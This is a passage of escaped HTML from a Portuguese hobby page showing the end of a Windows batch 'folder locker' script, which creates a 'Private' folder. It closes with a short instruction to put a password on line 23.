rgb(92, 92, 92) !important; display: block !important; float: left !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0.3em !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; width: 3em !important;"&gt;31.&lt;/code&gt;&lt;span class="content" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: rgb(255, 255, 255) !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-color: rgb(108, 226, 108) !important; border-left-style: solid !important; border-left-width: 3px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 3.3em !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;span class="block" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: url(http://www.tudosobrehacker.com/plugins/content/codecitation/styles/wrapping.png) !important; background-position: 0px 1.1em !important; background-repeat: no-repeat !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 7px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 1.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; text-indent: -1.5em !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="plain" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: inline !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;goto end&lt;/code&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="line alt2" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="number" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(92, 92, 92) !important; display: block !important; float: left !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0.3em !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; width: 3em !important;"&gt;32.&lt;/code&gt;&lt;span class="content" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: rgb(248, 248, 248) !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-color: rgb(108, 226, 108) !important; border-left-style: solid !important; border-left-width: 3px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 3.3em !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;span class="block" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: url(http://www.tudosobrehacker.com/plugins/content/codecitation/styles/wrapping.png) !important; background-position: 0px 1.1em !important; background-repeat: no-repeat !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 7px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 1.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; text-indent: -1.5em !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="plain" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: inline !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;:MDLOCKER&lt;/code&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="line alt1" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="number" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(92, 92, 92) !important; display: block !important; float: left !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0.3em !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; width: 3em !important;"&gt;33.&lt;/code&gt;&lt;span class="content" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: rgb(255, 255, 255) !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-color: rgb(108, 226, 108) !important; border-left-style: solid !important; border-left-width: 3px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 3.3em !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;span class="block" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: url(http://www.tudosobrehacker.com/plugins/content/codecitation/styles/wrapping.png) !important; background-position: 0px 1.1em !important; background-repeat: no-repeat !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 7px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 1.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; text-indent: -1.5em !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="plain" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: inline !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;md Private&lt;/code&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="line alt2" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="number" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(92, 92, 92) !important; display: block !important; float: left !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0.3em !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; width: 3em !important;"&gt;34.&lt;/code&gt;&lt;span class="content" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: rgb(248, 248, 248) !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-color: rgb(108, 226, 108) !important; border-left-style: solid !important; border-left-width: 3px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 3.3em !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;span class="block" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: url(http://www.tudosobrehacker.com/plugins/content/codecitation/styles/wrapping.png) !important; background-position: 0px 1.1em !important; background-repeat: no-repeat !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 7px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 1.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; text-indent: -1.5em !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="plain" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: inline !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;echo Private created successfully&lt;/code&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="line alt1" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="number" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(92, 92, 92) !important; display: block !important; float: left !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0.3em !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; width: 3em !important;"&gt;35.&lt;/code&gt;&lt;span class="content" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: rgb(255, 255, 255) !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-color: rgb(108, 226, 108) !important; border-left-style: solid !important; border-left-width: 3px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 3.3em !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;span class="block" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: url(http://www.tudosobrehacker.com/plugins/content/codecitation/styles/wrapping.png) !important; background-position: 0px 1.1em !important; background-repeat: no-repeat !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 7px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 1.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; text-indent: -1.5em !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="plain" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: inline !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;goto End&lt;/code&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="line alt2" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="number" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(92, 92, 92) !important; display: block !important; float: left !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0.3em !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; width: 3em !important;"&gt;36.&lt;/code&gt;&lt;span class="content" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: rgb(248, 248, 248) !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-color: rgb(108, 226, 108) !important; border-left-style: solid !important; border-left-width: 3px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 3.3em !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;span class="block" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: url(http://www.tudosobrehacker.com/plugins/content/codecitation/styles/wrapping.png) !important; background-position: 0px 1.1em !important; background-repeat: no-repeat !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 7px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 1.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; text-indent: -1.5em !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="plain" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: inline !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;:End&lt;/code&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
lá na 23ª linha está em negrito 'senha aqui'&lt;br /&gt;
troque esse 'senha aqui' por uma senha q vc queira&lt;br /&gt;
ficando a linha assim:&lt;br /&gt;
&lt;br /&gt;
